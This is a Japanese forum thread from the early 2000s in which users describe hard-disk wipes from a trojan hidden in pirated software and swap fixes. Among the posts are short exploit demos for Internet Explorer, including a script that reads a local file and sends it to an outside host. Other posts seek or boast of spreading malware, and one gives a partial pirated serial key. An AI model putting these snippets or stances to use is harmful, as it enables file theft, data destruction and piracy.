このプログラムは種類が　アプリケーション　のファイル
を実行するために必要です。

と画面に出てきて、SirC32exeを検索してもどこにもないのです。
なんとか方法はないのでしょうか？

とにかく、タスクの欄がインターネット、文字とタスクスケジューラーしか
表示されていませんし、どうすることもできません。

もしくは、どこかにきいてみればいいよ、とか
このサイトならきっと解決できるよ、などといった
情報がありましたら、ぜひ教えてください。

こんな内容の php スクリプトを用意し、
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>

これを readme.txt という名前で保存する。で、AddType application/x-httpd-php .txt する。で、IE からアクセスしてみる。

　IE 5.01 SP1 や IE 6 からアクセスすると、「次のファイルをダウンロードしています - readme.txt - ファイルを開くか、ファイルを
コンピュータに保存するか選択してください」というダイアログが出る。で、「開く」と答えると、今度は「次のファイルをダウンロードしています - calc.exe -
ファイルを開くか、ファイルをコンピュータに保存するか選択してください」というダイアログが出る。これは正常だ。

　ところが、IE 5.5 SP2 からアクセスすると、「次のファイルをダウンロードしています - readme.txt - ファイルを開くか、ファイルをコンピュータに保存するか選択してください」というダイアログが出たときに
「開く」と答えると、いきなり calc.exe が実行されてしまうのだ。あな恐しや。手元では IE 5.01 SP2 / 5.5 SP2 / 6 on Windows 2000 SP2 で確認した。

　実験したい人は http://www.st.ryukoku.ac.jp/~kjm/test/readme.txt にアクセスされたい。ここでは calc.exe ではなく lhasa016.exe になっている。

LightWave7.0 日本語版(28M前後）だったと思う。
↑を落として解凍したら、中にはいくつかのフォルダ
(ちなみにこのフォルダのひとつの中には動作可能な6.5が入っていた)と
setup.exe(たしか25k)があった。
で被害状況としては、setup.exeを実行した途端にデータの消去が始まって
ファイルのみ全部消えていくというもの。
実行したらHDDガリガリ鳴りはじめて、動作も重くなったから
タスクマネージャー(プロセス)でしらべてみたらsetup.exeがCPU100％近くなってて。
やばいな〜と思ってソッコーでプロセス終了させて。
おそらく数秒の間だったと思うんだけど結構ファイル消されててさ。
まぁいつかこんなこともあるだろうと思って、たいしたファイルも置いてなかったからよかったんだけど。
ちなみその時(フォーマット時)ルートに「xyz(拡張子なし)」とかいうファイルが生まれていて
中身を見てみたら、「You did a piracy, you deserve it」って書いてあった。
初めての事だっったから、どうなるのか最後まで見てみたくてもう一回setup.exeを実行してみた。
大量にあるファイルがガシガシと亡くなっていくのを見ていた。
で、そのままＯＳ再インストールして気になって調べてたらココを発見したというわけです。
一通りこのレス読んでみたんだけど、既出と違う点は
setup.exeを実行したとたんにフォーマットが始まるということ。
亜種かな？どうなんでしょう。
長レススマソ、初めての日の夜だからさ、興奮してて寝れなくてさ。

>>670
そりは恐ろしい

わしの友人がＭＸでWhistler食らったようなので報告。
何故かProgram Files内のファイルは全部無事。あとﾃﾞｽｸﾄｯﾌﾟ上に
置いてあったDocファイル２個の内１個が生き残った模様。
（一応ﾉｰﾄﾝ入ってたみたい）
AudioMagicとやらを入れた後に再起動したら・・と言っていたが
他にも短期間でたくさんｲﾝｽﾄｰﾙしてたみたいでなにが怪しいかわからんようです。
解凍に失敗したのもあったらしいし。
役に立たなくてｽﾏｿ。

データはみんな別のPCにあるからへっちゃらとか言ってこりてない様子。
Windowsの再ｲﾝｽﾄｰﾙが面倒だったと言っていたが。

>>670
亜種じゃくて、そのものだよ。
過去ログ全部読んだ？
２８MB前後のLW7に入っているのは有名な話。
というか俺もそれにやられた（8月頃）。

ちなみに、入っているのはちゃんとしたバージョン７だよ。
HV3のスプライトモードなど、７の新機能も入っていたし。

>>670
ごめん、良く読んだら、再起動前に始まるのね・・・
だったら亜種だね。
恐ろしいね。

>644
Linuxで遊ぶ為のサブPCとして中古PCを買ってきたんですよ。
インストールする前にFinalDateでHD見てみたら病院のカルテが
数GBあるんだけどぼくはどうしたらいいと思いますか？

ちょっと衝撃でした。

すれ違いスマソ。

>664
の間違いです

さがりすぎてるのであげとく

>>675
欲しいざんす。

凶悪ハッキングについてこレだろ。
http://www.puchiwara.com/hacking/hacking.html

>>593 >>601
う〜む。はじめてこのスレ全部読んだんで、激亀レスなんだが…
Wingroove事件のあれは作者の「故意」なのは当然なんだけど
結局作者氏は「事故」で通してしまったな。たとえ相手がM$社でも
「事故」だと主張されたら騒ぐ程度しかできん。

このスレの大方の住人には悪いが、俺、割れはやらんので
事件当時はWingroove作者側を応援しとったんよ。
いっそ「不正発見したらHDD消去が当然」のコンセンサスが
出来あがったらよいとさえ思ってた。全部のシェアウェアに
そういう機能をいれてくれと…。いや誤動作の可能性も承知だが。
んなこというとこのスレの住人からは狂人扱いされそうだが…、
正規ユーザが不正ユーザに対しての「明確なアドバンテージ」を持つ
としたらこういう形しか無いと思っとったんだ。

けど、結局あのWingrooveの作者あざらし氏も、保身からか
「事故」で通してしまったのを見て、応援する気なくしたよ。
結局作者自身も「悪事」を働いてるって自覚しとったんだと。
巧妙に潜伏期間をおいて、OSのシステムファイルIO.SYSの仕業にしたて、
自分に疑いが掛からないようにして、もう悪意たっぷりだったと。
性根はウイルスの作者と大して変わらんのだと…。

しかしこれはP2Pの無かった時代のことなんで、改めてP2P時代の
割れが入り乱れた状況を考えると、製作者側の報復装置としては、
似たようなアイデアは幾らでも出てきそうな気がするんよ。
「テロ支援国家には正義の報復攻撃を」なんていう恐ろしい感覚を、
多くの先進国が支持してる時代だ、絶対過激なのも出てくる。
あ〜説教臭く聞こえたらすまん。でも、ほんとそういう気がする。

>>680
>巧妙に潜伏期間をおいて、OSのシステムファイルIO.SYSの仕業にしたて、
>自分に疑いが掛からないようにして、もう悪意たっぷりだったと。

え、そんな凝った仕組みだったの？本当ですか？

当時、議論がさかんだった時に実験した人の、
ニュースグループでの発言では…

不正尻有を入れて、次回再起動した時点でIO.SYSが書き換えられて、
ある程度の日数（８日？）を置いて、その改変IO.SYSがHDDのFATを
０クリアする…というものだったはず…。

>>682
そうなんですかー。
なんか嫌な感じですね。
シリアルを1文字間違えたりしてもダメなんですか？

　　★　　　　　☆・。
　　　　　　 ☆☆　　　・
　　　　　　☆☆☆　　☆　　・★
　　　　　 ☆☆☆☆
　　　　　Merry Xmas　・．☆
　　　　　☆☆☆☆☆　　　・：☆
　　　　 ☆☆☆☆☆☆
　　　　☆☆☆☆☆☆☆　　　　☆。・☆：
　　　　　　 　｜｜
　　　　 　 HHHHHHH　　

>>682
　↑ごめん。
不正尻有入れてある程度（２ヶ月？）の日数を経て、
さらにMIDI再生を行った日数が８日目に達して始めて、
OSの終了時にIO.SYSを改変→再起動後FAT消去
だったようだ…。

>>683
あ、ちなみに不正シリアルってのは、
割れサイトで公開されてた（元は正規の）シリアルなんで
「間違ったシリアル」って意味じゃない。

あのー宜しければどなたか私にウイルスを送って頂けませんか。
ネットを始めて6ヶ月になるのですが、まだウイルスというものを見たことがないのです。
メールはプレビューｏffにしていますし、メアドは学校の園芸部のものになりますから万一爆発しても大きな心配は要りません。
必ず厳重に扱いますので宜しければ、幾重かに圧縮された上で上記アドレスにお送り頂ければ幸いです。

>>687
捕まるよ。

＞687
ＭＸ

>>687
[charbeljapan]で検索するといろいろ出てくるね。
スパム食らった人？くだらない報復は止めてniftyに陳情でもしたほうが効果的じゃない？

このスレで良いのかな？

落としてはいけないリストのサイトで書き込みがなかったので、一応情報。

【アプリ】 アダルトゲームのモザイクを外すユーティリテイ集(1).zip
サイズ　（私の手元のプロパティから）171,729バイト

友達経由（その友達はＭＸでﾀﾞｳｿ）でもらったので私は直接ＭＸからﾀﾞｳｿしてません。

自動ウイルススキャンで、ALICE_T1.exeの中から、W95.Hybris.worm
みっかりましたので、ご報告まで。

アンチウイルスソフトは
ノートンとバスターどっちがお奨め？
一応バスター２００２は２００１持ってるから無料で使えるけど
なんか重くて・・・・

遅ればせながら件のウィルスにかかってしまったようだ。しかも2回。
どうやら原因は直前にMXで落としたFinaldataとみてほぼ間違いない。
ただしデータそのものはFinaldataで完璧に復活できた。
OSはWin2k。

>693
ウイルス入りのファイナルデータで、データ復活？

でもウイルス感染したままの状態で復活ってこと？
説明ｷﾎﾞﾇ。

カビキラーにカビが生えちゃったみたいな喜劇だな（藁

FINALDATAは悪魔のtoolです。MXよりｺﾜｲ。お薦めできない。

>>695
ﾜﾗﾀよ

でも、この場合「カビの生えたカビキラー使っちゃった」だな。。

まず、別に必要はなかったが戯れでFinaldataを落としてみた。
いろいろやって再起動したら発症したので、すぐにOSをクリーンインスト。
で、よせばいいのに再びMXでFinaldataを落としデータを復旧、バックアップを取る。
そのFinaldataも感染していたらしく、再起動でまた発症、というわけさ。

もらったカビキラーにカビが生えてそのカビをごまかす為に
カビのカビキラーを使ったらまたカビた????

ゴメソ。意味不明。　

良かったな、いい経験だ

なんだか　DOM防止パッチ2.65　あたり　か
napgaiterだっけ?　この二つのどちらかわからないが実行したら
再起動後　逝きましたわ　HDD　全部　フォルダだけ
で　終了したら　再起動不能....

かなり貴重なファイルやメール、お気に入り.....
いままでの環境を再構築と考えただけで最悪です。

みなさん、気をつけてください

NortonGhost2002 日本語版　要注意

>>702
もうちょっと詳しく…

中身は 2001です。readmeみると2001と記述してあり、
で、もしかしたら中身は2002かななどと思い
ウィルスチェック後、共有ファイルが偽物じゃ悪いと思い
中身確認のためインストーラーをちょっとでも起動したりするとひっそりッドスネークします。
気づかずに再起動後した場合、あなたのminePCは　白痴になります。

千と千尋の　顔なし　が　急増中
金が土に変わる前に活用するべし....

>>704
とてもウィットに富んでますね。何かいいことでもあったんですか？

>>705

べつに . . . .

>>704
なんだか詩人ですね。
もっと詳しいレポート希望。

今しがたWinSvc.exeにやられた。
うおー！データパーティションが空だぜー。
全滅はまぬがれたが
MSCONFIGしとけよ俺。

ハイテンション欝。

これはどうですか？
http://makaroni.free-city.net/index.html

>709
氏ねやヴォケ

>>709
マルチポストしまくりだな。
まぁ二度とここ読まないだろうけど。

なっち…
Finaldataに助けもとめて
さらにそれでまたやられると
ダメージきついな。

ＷiｎＧrooveの他にFileVisorとかもやばくないか？

と言うか俺も8月ぐらいにHDDのデータ吹っ飛ばされたよ。

症状は同じ。フォルダ残して真っ白。
まぁ、Whiterの仕業とわかっただけでも良かった。

ちなみに俺のときは確かATOK14だったかな？
それ開いた瞬間にDOSが起動してOSハング⇒再起動⇒撃沈
OSが2000だったからなんかおかしいと思ったが割れ物だしあんまり騒げなかったので鬱だった。

ちなみに吹っ飛んだデータ　40GBのHDD×2=80GB.....。

吹っ飛んでから2週間は立ち直れなかった・・・。

二度と体験したくは無いな・・・。鬱

>>704
もっと詳しく

>>713
俺は６０G+６０G+ネットワーク上の６０G+６０Gで
２４０GB飛んだよ。ショックだった・・・・

guest　guest　

うお〜いっ！！さっきファイル確認してたら
whisterとwhistler発見した！
ファイルの名前は
Adobe Premiere6.0とウインドウズＸＰ
既出だったらスマソ！

２８日に感染しました。
ＭＸでインターネットサムライを落として、起動。
フリーズ→再起動後ＨＤＤのアクセスが異常にあった。
１の通り、フォルダを残して中身は空っぽ。
program filesだけは無事。
卒業論文のデータがあぼーん。
鬱氏。

Norton Utilities 2002J(fcd).zipってのを解凍したら
Download4\NortonUtilities2002当該{語版\NortonUtilities2002日本語版
という具合にフォルダが作成されて、フォルダが消せない症状が出ました。
（リネームも何にもできない）
その後、再起動でHDDあぼーん。

ノートンはインストールしてないのにトロイ仕込まれるのって
あるんでしょうかね？

WinSvc.exeを調べてみたところ、奇数月の13日にHDD全消去プログラム
が作動すると書いてあったが、↓
http://japan.ahnlab.com/virusinfo/view.asp?seq=85&pageNo=5

俺が被害にあった日は12/29でした。
亜種かな。

つーかMXで逮捕者が出た今でも、アプリを共有している無謀な奴はいるんだねぇ。

すいませんが、質問お願いします。
友達がWinMxを使ってDLしまくってると言ってるんですが、私はやばいからやめとけ、
そういったのですが、「大丈夫、DLはいいんだよ」といってるんです。
DLしても大丈夫なら、私も試してみようかと思ってるんですけど、DLするのは危ないんでしょうか？
ちなみに友人は曲メインで落としてるらしいです。

>>722
スレ違いです。MXのスレに行きましょう。

>>722
共有するのが公衆送信権というのにひっかかってﾀｲｰﾎされる。
共有無しで落とすだけなら大丈夫だが、DOMで低速回線ならMP3でも弾かれるよ。

WinRAR 290日本語をDL。
添付のテキストに丁寧に書かれていた通りにインストール。
見事にWhiter埋め込まれて次の起動でHDのデータ全部あぼーん。

自分で買ったCDRドライブについてたWinCDRのCDを無くしてしまったので
昨日落としてインストールしました。
ver6.0です。　今このスレを今はじめて見てすごく怖くなったのですが
再起動しても消去されてなければ大丈夫でしょうか？

WinCDRはマジでヤバイ！俺の友達もやられた。特に６が危ないそうな。
ウィルススキャンしてみ。
あとStartStop入れて数日は確認しないとね。

Symantec
http://www.symantec.com/region/jp/securitycheck/

StartStop
http://www.tfi-technology.com/startstop.htm

数日後にあぼーんってこともあるらしいよ。

まじっすか？普段割れなんてしないのにCD探すのがめんどいって理由で
唯一落としたのでヒットか？
Whiterって単語を検索したところなかったんだけどやばい？
寝れねーー

>>728
とりあえずオンラインスキャンしてみる

今のうちにバックアップ取っとけ。

最近じゃ何にでも入ってるよ＜ウィルス

Symantecでオンラインスキャンして問題なければ大丈夫ですかね？
今途中なんですけど

今スキャン中なんですけどすでに感染ファイル１って出てます・・・

ここはMXやってる奴が自分の自業自得を語るスレ？

レジストリを見てあやしいスタートアップが無いか確認すれば良いじゃん。
単にそれだけの話。意味も無く怖がるな。

>>736
レジストリじゃなくてもmsconfigであやしいスタートアップがなければ大丈夫？

2度と再起動しなければ多分大丈夫！

ぜんぶ隠しファイルにしとけば多分大丈夫！

たいへんねぇ。

はにちゃんねるをよろしく。
http://www.isn.ne.jp/~honey/hc/

>>737

君、ニュータイプじゃなようだね
いつも、スカウターをつけてるようだし。
電子レンジにでもなっちまえ!!

　　　　　

>>742
ふん!　おまえは所詮、ニュータッチ　の箱売り娘。

Virtual PC使えばいいじゃん。前イメージをコピーするだけで復旧できるし。
最近は Virtual PC自体にウイルスがついているので体験版を落としてきて
パッチを当てるのがお勧め。

もっとも、Virtual PCが一番役に立つのは 自作のウイルスの実験台
にする場合だけどな(BIOS破壊は除く)。

やっと流行おくれのTROJ_WHITER.Cを入手しました。
クリスマスプレゼントは、できなかったけど、
お年玉は、みなさんに差し上げます。
来年も良いお年を・・・

あけましておめでとう！
オイラも、いっぱいバラまいちゃった。
一富士、二鷹、三なすび、起きてビックリ玉手箱になるでしょう。

>>745-746
(　´_ゝ`)ﾌｰﾝ

745と746が捕まった時の顔といったら･･･(ﾌﾟﾌﾟ

ウイルスを自作できる744も危ないヤツだな！
自作できないワシは、コレクション専門だ。
30種類以上集めたが、ほとんど古くて使いもんにならん。
今のところ「W32.Whiter.Trojan」の亜種が最強だな。
ウイルスって、検索すれば簡単に見つかる。
ここに来た人の中にも、入手しているヤツが、かなりいるハズだ。
不況が、犯罪をネズミ講のごとく広めている。

再起動の前にレジストリーをみるべしと書いてるけど
どこをみればいいの？

ていうかこのスレに載ってるし。俗に言うガイシュツってやつだ、君。

ＰＣに詳しくないからわかんないんだよ
例えば　c:\WINNT\system32\whismng.exe　でＰＣ内を検索とか
する事なのかな？

http://www.ebcvg.com/vx_exe.html

リンクをたどるとまだたくさんある。

>>753
おお！サンクス。
ちなみにWhiter欲しいんだが見つからん．．．

見つかれば教えてください。
「W32.Whiter.Trojan」と「ニムダ」が合体したようなウイルスは？
つまり、メールで伝染させてハードディスク全消去してしまうウイルス。
きっと、あるはずだ。　ほしい・・

>>755
そんなウィルスがあったらおそろしすぎる。
でもありえなくはないんだよな…
(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

かなり執拗に捜査されるだろうね。
捕まって名前晒されて祭り。
損害賠償とかも大変そう。

ウイルスバスターの尻おせーて

ω

サーカムだよそれ

スマソ。マチゲータ。昔のはなししてたと思って待った

>>758　ほれ
SJF-9999-7385-8479-9082
ただし、最初の一文字が抜けてるよ　自分で探そう！

>>755
あのなぁ。
W32.Whiter.Trojanとニムダ手に入れてソース見ればいいだろ？
改造の具合によっては最強の物ができるぞ。

おれもニムダの変種を作ったことがあるが、そのまま流用したんで
ウイルスチェックに引っかかってしまった。まだまだですな。

エボラウイルスはすぐに発病して被害も大きいから一時的には大惨事に
なるけど逆に人類に絶大な被害を与えることもないそうな。
エイズウイルスは潜伏期間が長いので

「MX 落としてはいけない物リスト」のサイトは、
閉鎖ですか？　それとも更新中ですか？

ちゃんと　ありました。

漏れも昔やられた。ＭＸは入れてたが何でなったかはわからん。
起動できなくなったのでスキャンディスクをかけたところ、
３３バイトのFile****.chkや、Dir****というディレクトリが作られてた。
結局このファイルを修復する方法はないの？

画像ファイルがすべてなくなりました。二日前くらいに。
それに気付いて他にも確認したんですがどうやら画像のみの被害でした。
フォルダはそのままのこっていました。空のですけど。
そのときにはまだ動画ファイルはちゃんとあったと思います。
メールは確認してませんでした。
オンラインスキャンもしましたがなにも検出されず、ウィルスではないのかな、
とおもっていたら次の日、今度は動画ファイルがすべてなくなっているんです。
「昨日はあったのに！」と思い、またスキャンしたけどなにもなしでした。
いままでのメールも全部なくなってしまいました。なにが原因でしょうか？
数日前からパソコン起動後（１分後位）にＦＤＤのアクセス音がきこえました。

>768
おそらく「Wininits.exe」の仕業ではないかと。
「初心者質問スレッド」の450あたりからその話題が出ています。
応急処置は
http://pc.2ch.net/test/read.cgi/sec/1008322606/475
で。
はい、あのスレの464です。

スタートアップ監視ソフトの正式名称、忘れた・・・
「Start and Stop」で合ってたかな？

>>769
「.exe」で検索したらそれありました。
でもテキストファイルはのこっていますし消えたのは
画像、動画、メール、htmlファイルなどです。
画像ファイルにもいろいろありますが、残ってたのはPNGのみで
あとは全て消えました。動画もMPG(?)とavi,が全部消え、残ったのは
MP3,ASF,rmなどです。メールはOutlook Express へようこそだけ、
というよりは初期化？されたかんじです。
いまさらなにがなくなっても驚きませんが原因がわからないと
また同じことですので。
応急処置はしませんが、そのうちリカバリＣＤで最初からの状態にします。
みつかったexeファイルは削除しちゃいました。これはもう根付いているんでしょうか？
なにかわかったら教えてください。

>>768
うちと似てるかも。
やっぱり数日前からＰＣ起動１分後位にＦＤＤにアクセスしてたし。
あとＷＩＮが立ち上がった瞬間に電源がいきなり落ちたり、起動した直後にＨＤにアクセスしたまま
固まったりちょっと挙動が怪しかったんでウィルスを疑って全ドライブスキャンしたけど異常は無し。
リカバリする事にして、ファイルのバックアップをしようとしていた矢先の事でした。
ハードディスクの空き領域がやけに増えていたんですよ。
データを保存してた場所は Ｄドライブ内に MyDocuments と Desktop、Ｅドライブ、Ｆドライブ。
調べてみるとMyDocumentsとＥドライブで空のフォルダを残して jpg gif mpg avi txt html がごっそり
なくなってました。残ってたのは mov mp3 rm png psd mht アーカイブファイル等です。
ここ見る前にリカバリしちゃったんだけど、これも「Wininits.exe」の仕業ですかね？

>771
http://pc.2ch.net/test/read.cgi/sec/1008322606/601-700
このあたりでも（616以降）話題になってる。
案外、深刻なんじゃないのか？静かなブームになるかも。

c:\WINDOWS\Temporary Internet Files\Content.IE5\OX2NGTIZ\l50[6] は 次のウィルスに感染しています： JS.KakWorm.Z
どうすりゃいいのさ？

<!--ipt
a=GetObject("c:\\test.txt","htmlfile");
setTimeout('window.open("http://tarikihongandou.shadowpenguin.org/WinSec/tarilog.cgi?name=test&chat="+a.body.innerText);',2000);
</scri-->

なにこれ？

>>774
ああ。
グニンスキーちゃんの見つけた最新バグ
IE GetObject() problemsね。
しかし、あのオッサン（？）良く見つけるね。。。
>>775
一回、本人のサイト探して逝ってみると良いよ。
少なくともマイ糞TechNetよりは為になる（ｗ
・・・IP晒してろぐる事ないぢゃんかよぅ。。

>>774
ああ。
グニンスキーちゃんの見つけた最新バグ
IE GetObject() problemsね。
しかし、あのオッサン（？）良く見つけるね。。。
>>775
一回、本人のサイト探して逝ってみると良いよ。
少なくともマイ糞TechNetよりは為になる（ｗ

・・・これ、ログってんの？？IP晒す事無いと思うけど。。

なんてこった。。
間違いカキコでラッキーNoゲット。。

http://pc.2ch.net/test/read.cgi/sec/994847789/173-182

An example of the malicious code has been provided by Georgi Guninski <[email protected]>:

a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");

http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3767

http://www.securityfocus.com/bid/3779

<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}

function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

>>769
"StartStop"ね。ググルで検索すれば一発で見つかるよ。

>783
感謝です。

>782
サンクス！　上の783のぶんまで感謝します。

VMWare3.0 でHDD逝きました。
確か容量が13M以内だったと思います。
インストール直後はいいのですが
インストールが終わって再起動します。
そうすると、HDDが徐々に削除されていきます。
ネットワークに共有を加えている方は、
そのファイルまで消えます。
フォルダだけ残してすべて・・・・・・・

皆さん気をつけてください。

漏れの４０Ｇのファイル達がぁぁぁぁあ！！
ＣＰＵ早かったせいか・・・１分程度で消えました・・・・

だからVMwareはオフィシャルサイトから落とせるっつーの。
わざわざMXで落とす奴がバカ

786>
MXとは一言も言ってないと思われ・・・・

ではオフィシャルサイトで配布してるVMwareにWhiterウィルスが感染してたと?

知り合いからいただきました。

ならその知り合いを頃しちゃいましょう。

ちょっとスレと関係ないんですけど､
RMファイルって見てるだけでブラウザを任意のサイトへ
飛ばすことって出来ますよね？
実は有料サイトの動画を見ていたら､勝手にブラウザが
そのサイトのトップページに飛ぶのですが､
これは、ウイルスへのリンクとかブラクラへのリンクを
仕込むことが可能ということですよね？

年末にトロイにHDDをずたずたにされたおかげで心機一転再フォーマットしたら
不良クラスタが減ってしまいました

>>791
できるね。
ちゃんとIEのセキュリティパッチをあてておかないと危険

ﾖｼ!
ｺﾚﾃﾞﾏﾀfinaldataｶﾞｳﾚﾙｿﾞ
ｲﾋﾋﾋﾋ

↑てことはないよね。

だってWhiterで破壊されたファイルはFinalDataで復旧できないじゃん。

ﾊｧ?

>>797
ﾊｧ? 、とか言う前に、このスレ全部読んでみたら？
わかってないの君だけ。

ﾌﾟｩ?

age

マァマァ、落ち着けよ

（ﾟДﾟ）ｳﾎﾞｧｰ

先生我々は遂に
ｱﾌｫの797をﾊｹｰｿしました。
がなにか

わたしもやられました。
・まず、年末にｈｔｍｌファイルがすべてなくなっていた。
・ＦＤへの意味不明のアクセスが毎起動時にあり。
・今年に入って、ＧＩＦ、ＪＰＧの全消失。
・ＭＰＧ、ＡＶＩの消失。
・ＨＬＰファイルの消失。
・ＳＣＲ（スクリーンセイバー）の消失。
リカバリーディスクで、購入時の状態にもどしましたが、
痛い。

去年某[k]サイトのリンク先にあったFinalDataEnterpriseを
拾ったんだけど､これCD-ROM版らしいんだよね。
autorun.infとかautorun.exeとかあるんだけど。

これヤバイの？
総ファイル10,047,341バイト。
尻無いから単なるコレクションだが（ｗ

こんなスレがあったのか。
当方も被害に遭いました。

あ〜あ

年末にハードディスクを買い換えたところで
それ以前のデータは前のＨＤＤに残したままだったので
まあ、被害は少ない方だと思いますが。

ちなみにDriveImage2001 for CD-Rだったと思います。

　　　　　　　　　　　

>>788
VMWare3.0ユーザです。
サイトで評価版ダウンロードして正規にレジストしました。
インストールしてから２ヶ月以上経つけど問題なく動作中。

先週末、海外のエロサイトを回っていたら、突然ハードディスクにアクセス
されてしまった。そしたらハードディスクの中身が急激なスピードで削除されて
いきました。とっさの判断でＰＣのリセットボタンを押し、そして再起動と
同時にリカバリーディスクでクリーンインストールしました。

同じような経験された方、他にもいますか？

>>810
JavaとActiveXの設定はどうなってる？

>>811さん

JavaとActiveXって名前しか知りません。どのように設定すればよいのですか？
それでもって、ついでに私のハードディスクの中身が削除された原理を教えて
いただけませんか？

Autoexec.camてなんですか？

>>812
その様子だとデフォで閲覧してたのね・・・

>>814さん

恥ずかしながらそうです。だから私の疑問について返答して
下さいませ。

>>815
とりあえず　↓ここでチェックしてみては？
ttp://inetsvr3.nicnet.co.jp/test/chkVM.asp

汚染を除去しました。

shl.RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\Tcpip\\Parameters\\Hostname");
if(0 < s.length){
alert("[危険] ホームページ側から、"
+ "自由にレジストリを読み書きしたり、"
+ "ファイルを削除したりすることができる状態です。");
if(confirm("[危険] 試しに、"
+ "レジストリからコンピュータ名を"
+ "読み出してみてよいですか?")){
alert("[危険] "
+ "レジストリからコンピュータ名を読み出してみました。\n"
+ "コンピュータ名は 「" + s + "」 ですね?\n\n"
+ "レジストリを読み書きできるということは、"
+ "コンピュータの設定を自由にあやつることができるということです。\n"
+ "非常に危険な状態です。");
}
}
}
catch(e){
}
}
setTimeout("attack()", 3000);
// -->
</script>
<applet width="1" height="300" code="com.ms.activeX.ActiveXComponent">
Applet: com.ms.activeX.ActiveXComponent<br>
(この文字が表示されているブラウザは、問題ありません。)
</applet>

<h2>[危険] と表示されたら . . .</h2>
<p>ただちに対策を行いましょう。 そのままにしておくと、Web ページを見ているあいだに
Windows を使用不能にされてしまう可能性があります。</p>
<dl>

>>816 のリンク先のさらに幾つかリンクがあるから、
そこも読んで勉強してね。

>>814じゃないけど さん

ご丁寧に書いて下さってどうも有り難うございます。それではそのサイトに行って
勉強することにします。

>>810
とりあえずIEを使っているなら今すぐすること
IEのバージョンアップしてここで修正プログラムインストールね。
http://www.microsoft.com/japan/enable/products/security/
次にIEを立ち上げてブラウザの一番上の段のメニューバー
ツール＞インターネットオプション＞セキュリティタブ＞で「高」にしてブラウンジングする。
「レベルのカスタマイズ」ボタンを押せばわかると思うけど
それであくちぶXとか無効になってるでしょ。

あとはセキュリティ高にしてると見れないサイトも出てくるけど
その度にいちいちインターネットオプションを出すのがウザイなら
タブブラウザが便利と思われ。
タブブラウザは色々好みが分かれるけどツールバーボタンからの
セキュリティの切り替えが一番秀逸だと思うのがこれ
http://pc.2ch.net/test/read.cgi/win/1011191549/l50
お気に入り・ブックマークの移行
http://www6.plala.or.jp/downward/MDI/help/html/first_import.html
とかヘルプもあるし色々試してみるとヨイ。
んでオミトロンhttp://pc.2ch.net/test/read.cgi/win/1010675673/l50
入れたりしたら。

MXのfinaldata使ったら消されてしまった…。
ファイナルデータで復旧出来るかどうかわからないからMXでまた落として
来たけど(懲りない奴)どうなんかな…。
既出なら悪いけど、安全なファイナルデータとかわかります？
ｴﾝﾀｰﾌﾟﾗｲｽﾞ版10572681ﾊﾞｲﾄなんだけど。

直せるならちゃんとNTFS版ﾊﾟｰｿﾅﾙ買ってくるから、直せるかどうかだけでも知りたい。
(お試し版ではファイルは出てくるんだけど…)

お前もカビキラーにカビ生えちゃったパターンか…（藁

ﾅﾝﾀﾞﾄｺﾞﾙｧヽ(`Д´)ﾉ

って、よく見たら違う板だったのね…板違いｽﾏｿ
(他板から飛ばされて来た)

>>822
だから復旧できないって。
過去ログくらいよめ！

>>822
俺も同じのでやられたぞ。
オーバークロック試してたらドライブ見えなくなってしまったので、
MXでFainalDataのエンタープライズ落としてきて復旧作業してたら別ドライブのデータ見事に消されてしまった。
でもインストーラーにウイルスくっついてるだけのようなので
レジストリエントリ消して、windows\system32\winsvc.exe消してそのまま使ってる。
落として来たZIPは消しちゃったからサイズ分からんけど。
で、データサルベージの件だけど、俺の場合はファイル見えても全部33バイトになってて使えなかった。
1ヶ月前にバックアップ取ってあったから、被害はここ1ヶ月のお宝画像だけだったけどな。

そのウイルスﾎｽｨｰ
なんて名前？

>>828
http://www.google.com/search?q=winsvc.exe&hl=ja&lr=lang_ja

>>825
板＆スレ 誘導は悲しいかな確かに合ってるぞ！！

winsvc。
MXで持ってる人居ない.....。

http://www.geocities.co.jp/SiliconValley-Bay/4070/yume.swf

>>826
関連スレと過去ログ100まで読んだが…。
８年使ってきて初めて食らったウイルスがこんなまぬけなものだとは。
ＭＸなんか久しぶりに起動したのに。ヽ(`Д´)ﾉｸﾔﾁｲ!
バックアップなんかかけらもとってないからあっさりオールクリーンだよ。
移行にゃ丁度よいか…。

とりあえず、どうせもう消えちまった事だしウイルス付復旧ソフトで
見てみるとするわ。
>>830
一応ＭＸ関連は板違いｸｻｲんで
>>831
600ﾒｶﾞのエロ動画となら交換しちゃろか？(笑

202.221.45.130

俺のIＰアドレスだ、おめーらの技量じゃハックデきね〜だろうけどｗ

(ﾟдﾟ)ｳﾏｰ 持ってねーか？

つーか、落ち着いて過去ログ読んだら症状そのものじゃん(；´Д`)
冷静になれず糞レスしてしまって申し訳ない。
今頃かかるなんて(ﾟдﾟ)ｱﾎｸｻｰ

でも壊れたファイルをフォーマットする意気地がないんだけど…。
落としたエンタープライズ版は98/Me用だから使えねーし諦めがつかん…。


しかしまあ、今までウイルスに食らった事なかったし、バックアップもTOWNS時代に
フロッピーでｾｺｾｺやったっきりで数年しなかったんで、これを教訓にするか…。

ウイルスと無縁と思ってる奴が泣きを見るって煽り半分で上に書いてるけど
まさにその通りですな(泣)


良スレageヽ(`Д´)ﾉ

正直言ってファイナルデータって復旧出来なくない？
例え取り出せても、アプリのexeが起動しないし。

そろそろこのスレも使い切ってしまいそです。
どなたか今までのまとめを発表してもらえないでしょうか？
原因・結果・対策・

結論:MXには手を出すな。

>>837
このウイルスは、複雑な消し方をしているから復旧できないだけ。
普通に消したり、フォーマットしただけならば復活できる。

わしもやられるまで「こんなん引っかかったらオワリだな」と
みんなで言っていた翌日やられた
気を抜いてPCやってはいかんと思ったよ

ACCSが流してんじゃねーかと勘ぐってみたり

おまえ〜、それはないだろう〜　（流行ってるギャグ）

そんなこたぁ　ないでしょう。（某ゲームメーカーN社から某MS社に移った広報：Hさんの言葉）

仲間がいるのか？
俺は今朝午前３時に
HDD50GB全部逝ったよ。

再起動した直後じゃないのに、
